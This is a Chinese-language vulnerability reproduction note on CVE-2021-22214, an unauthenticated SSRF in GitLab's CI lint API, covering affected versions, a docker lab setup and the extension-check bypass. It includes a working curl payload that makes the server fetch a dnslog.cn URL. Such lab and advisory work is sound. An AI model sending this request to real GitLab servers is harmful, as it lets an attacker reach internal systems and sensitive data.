漏洞描述

GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git（版本控制系统）项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档，其include 操作支持remote选项，用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址，同时由于后端会检查最后扩展名，加上?test.yaml 即可绕过。远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

利用条件

13.10.5 > GitLab >= 10.5

13.11.5 > GitLab >= 13.11

13.12.2 > GitLab >= 13.12

环境搭建

使用docker 搭建环境：

docker pull vulfocus/gitlab-cve_2021_22214:latest

docker run -d -P vulfocus/gitlab-cve_2021_22214

访问成功、环境搭建成功！

漏洞分析

漏洞原理

CVE官方给出的描述是 gitlab ssrf 未授权漏洞。

doc/api/lint.md 文件中提到对测试 yml文件是否有效。

该漏洞源于对用户提供数据的验证不足，远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

使用curl命令配合dnslog.cn 做漏洞测试。

curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://543jeh.dnslog.cn/api/v1/targets/?test.yml"}'

在DNSlog记录发现的访问记录，表明漏洞存在。

修复建议

当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。